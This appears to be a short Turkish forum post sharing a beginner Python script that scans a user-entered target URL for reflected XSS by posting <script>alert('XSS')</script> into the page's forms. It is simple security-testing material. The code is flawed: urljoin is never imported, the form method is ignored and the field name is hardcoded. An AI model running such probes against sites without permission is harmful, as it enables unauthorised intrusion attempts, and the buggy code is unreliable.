Bunlar giriş seviyesidir beraber geliştirebiliriz.
Python:
import requests
from bs4 import BeautifulSoup
def xss_ara(url):
try:
# URL'den sayfayı indir
response = requests.get(url)
response.raise_for_status()
# HTML içeriğini BeautifulSoup kullanarak analiz et
soup = BeautifulSoup(response.text, 'html.parser')
# Tüm form etiketlerini bul
form_etiketleri = soup.find_all('form')
# Her form için XSS açığı kontrolü yap
for form in form_etiketleri:
action = form.get('action')
method = form.get('method')
if action and method:
# Basit bir payload ile formu gönder
payload = "<script>alert('XSS')</script>"
data = {'input': payload} # Burada 'input' form alanının adını kullanıyoruz, sizin durumunuza göre değiştirebilirsiniz
# Formu gönder
response = requests.post(urljoin(url, action), data=data)
# Payload'ın sonucu kontrol et
if payload in response.text:
print(f"Potansiyel XSS açığı bulundu: {urljoin(url, action)}")
except requests.RequestException as e:
print(f"Hata: {e}")
if __name__ == "__main__":
# Kullanıcıdan hedef URL'yi al
hedef_url = input("Hedef URL'yi girin: ")
# XSS açıklarını ara
xss_ara(hedef_url)